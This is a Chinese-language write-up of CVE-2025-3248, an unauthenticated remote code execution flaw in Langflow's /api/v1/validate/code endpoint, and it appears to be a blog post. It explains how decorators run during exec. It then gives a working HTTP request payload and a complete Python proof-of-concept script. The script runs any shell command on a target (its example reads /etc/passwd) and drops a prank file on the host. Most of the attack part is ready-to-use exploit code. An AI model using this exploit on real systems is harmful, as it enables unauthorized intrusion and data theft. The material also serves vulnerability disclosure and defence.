CVE-2025-3248

文章目录

漏洞名称

CVE-2025-3248:LangFlow 未授权远程代码执行漏洞

漏洞描述

Langflow是一个流行的开源AI工作流可视化工具,允许用户通过Web界面拖拽式构建基于Python的智能体和数据处理流程。

在1.3.0版本之前,Langflow存在一个严重的未授权远程代码执行漏洞(CVE-2025-3248)。/api/v1/validate/code接口原本用来校验用户提交的Python代码是否合法,其内部通过ast解析代码后,使用exec执行所有函数定义。然而,Python的装饰器和默认参数表达式也会在函数定义时被执行,攻击者可以通过精心构造的装饰器或默认参数,在未授权的情况下实现任意代码执行。

漏洞复现

ui:

直接向/api/v1/validate/code接口发送包含恶意装饰器的Python函数定义,即可来实现远程命令执行:

复制代码
POST /api/v1/validate/code HTTP/1.1
Host: your-ip:7860
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 105

{"code": "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef foo():\n  pass"}

POC

python 复制代码
# langflowpoc.py
import sys
import requests
from pathlib import Path

if len(sys.argv) < 3:
    print("usage: python poc.py 'http://target:7860' 'cat /etc/passwd'")
    exit(1)

url = sys.argv[1].removesuffix("/") + "/api/v1/validate/code"
cmd = sys.argv[2]

message = "ello ur computa has virus ... (略)"

code_to_exec = f"""
from pathlib import Path
import os
try:
    for file in ['/tmp/ello_ur_computa_has_virus.txt', '~/ello_ur_computa_has_virus.txt']:
        Path(file).expanduser().write_text({message!r})
except:
    pass
raise Exception(os.popen({cmd!r}).read())
"""

payload = f"""
import os

@exec({code_to_exec!r})
def f():
    pass
"""

resp = requests.post(url, verify=False, json={"code": payload})
print(resp.text)
相关推荐
金士镧(厦门)新材料有限公司21 小时前
如何让PVC制品更安全?稀土抑烟剂助力安全防护
科技·安全·全文检索
云飞云共享云桌面1 天前
三维设计办公资源如何共享集中和安全管控?
运维·服务器·数据库·安全·自动化·制造
EkihzniY1 天前
配合式活体检测:让身份核验安全又便捷
安全
熙客1 天前
使用springsecurity+mybatis+mysql是如何实现JWT登陆
安全·安全架构
TH88861 天前
水陆安全监测仪:水域陆域的“安全哨兵”
安全
llxxyy卢1 天前
SQL注入之SQLMAP绕过WAF(安全狗)
服务器·安全
红树林071 天前
渗透测试之json_web_token(JWT)
网络协议·安全·web安全
云动雨颤1 天前
网站被劫持后怎么恢复?
安全·dns
m0_738120721 天前
内网横向靶场——记录一次横向渗透(三)
开发语言·网络·安全·web安全·网络安全·php
codervibe1 天前
协议欺骗工程实践:HTTP/FTP/Telnet/SSH 的伪装与实现要点
安全